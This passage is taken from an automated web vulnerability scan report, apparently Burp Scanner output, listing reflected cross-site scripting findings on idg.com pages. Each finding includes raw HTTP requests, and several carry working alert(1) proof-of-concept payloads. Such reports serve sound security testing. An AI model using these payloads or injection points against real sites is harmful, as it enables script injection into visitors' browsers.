Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG?6071f"-alert(1)-"5649c346001=1");
} catch(err) {}</script>
...[SNIP]...

2.130. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 681e8"%3b4555cf79d0f was submitted in the REST URL parameter 1. This input was echoed as 681e8";4555cf79d0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www681e8"%3b4555cf79d0f/HomeNew.nsf/docs/company_milestones HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www681e8";4555cf79d0f/HomeNew.nsf/docs/company_milestones");
} catch(err) {}</script>
...[SNIP]...

2.131. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4851"%3b9ad27ea35 was submitted in the REST URL parameter 3. This input was echoed as f4851";9ad27ea35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsf4851"%3b9ad27ea35/company_milestones HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsf4851";9ad27ea35/company_milestones");
} catch(err) {}</script>
...[SNIP]...

2.132. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f25"%3b04c47483c89 was submitted in the REST URL parameter 4. This input was echoed as 60f25";04c47483c89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/company_milestones60f25"%3b04c47483c89 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/company_milestones60f25";04c47483c89");
} catch(err) {}</script>
...[SNIP]...

2.133. http://idg.com/www/HomeNew.nsf/docs/company_milestones [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 905aa"-alert(1)-"d72675069e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/company_milestones?905aa"-alert(1)-"d72675069e7=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/company_milestones?905aa"-alert(1)-"d72675069e7=1");
} catch(err) {}</script>
...[SNIP]...

2.134. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1873a"%3b8cbab62b12d was submitted in the REST URL parameter 1. This input was echoed as 1873a";8cbab62b12d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www1873a"%3b8cbab62b12d/HomeNew.nsf/docs/contact_us HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:53 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www1873a";8cbab62b12d/HomeNew.nsf/docs/contact_us");
} catch(err) {}</script>
...[SNIP]...

2.135. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3070d"%3b8635bbbc483 was submitted in the REST URL parameter 3. This input was echoed as 3070d";8635bbbc483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs3070d"%3b8635bbbc483/contact_us HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:54 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs3070d";8635bbbc483/contact_us");
} catch(err) {}</script>
...[SNIP]...

2.136. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48944"%3b28ffbbcf7d6 was submitted in the REST URL parameter 4. This input was echoed as 48944";28ffbbcf7d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/contact_us48944"%3b28ffbbcf7d6 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/contact_us48944";28ffbbcf7d6");
} catch(err) {}</script>
...[SNIP]...

2.137. http://idg.com/www/HomeNew.nsf/docs/contact_us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f7e"-alert(1)-"b3cc543f05e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/contact_us?31f7e"-alert(1)-"b3cc543f05e=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:53 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/contact_us?31f7e"-alert(1)-"b3cc543f05e=1");
} catch(err) {}</script>
...[SNIP]...

2.138. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26bfa"%3b1baf8807546 was submitted in the REST URL parameter 1. This input was echoed as 26bfa";1baf8807546 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www26bfa"%3b1baf8807546/HomeNew.nsf/docs/corporate_profile HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www26bfa";1baf8807546/HomeNew.nsf/docs/corporate_profile");
} catch(err) {}</script>
...[SNIP]...

2.139. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6119f"%3b71da451f5 was submitted in the REST URL parameter 3. This input was echoed as 6119f";71da451f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs6119f"%3b71da451f5/corporate_profile HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs6119f";71da451f5/corporate_profile");
} catch(err) {}</script>
...[SNIP]...

2.140. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6379"%3b8834bed9364 was submitted in the REST URL parameter 4. This input was echoed as f6379";8834bed9364 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/corporate_profilef6379"%3b8834bed9364 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/corporate_profilef6379";8834bed9364");
} catch(err) {}</script>
...[SNIP]...

2.141. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85712"-alert(1)-"9259a875ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/corporate_profile?85712"-alert(1)-"9259a875ca6=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5039
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/corporate_profile?85712"-alert(1)-"9259a875ca6=1");
} catch(err) {}</script>
...[SNIP]...

2.142. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36e57"%3b024fc10ff1c was submitted in the REST URL parameter 1. This input was echoed as 36e57";024fc10ff1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www36e57"%3b024fc10ff1c/HomeNew.nsf/docs/idc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www36e57";024fc10ff1c/HomeNew.nsf/docs/idc");
} catch(err) {}</script>
...[SNIP]...

2.143. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 116af"%3b1f71a9ba6af was submitted in the REST URL parameter 3. This input was echoed as 116af";1f71a9ba6af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs116af"%3b1f71a9ba6af/idc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs116af";1f71a9ba6af/idc");
} catch(err) {}</script>
...[SNIP]...

2.144. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 359bd"%3bc32d7581091 was submitted in the REST URL parameter 4. This input was echoed as 359bd";c32d7581091 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idc359bd"%3bc32d7581091 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
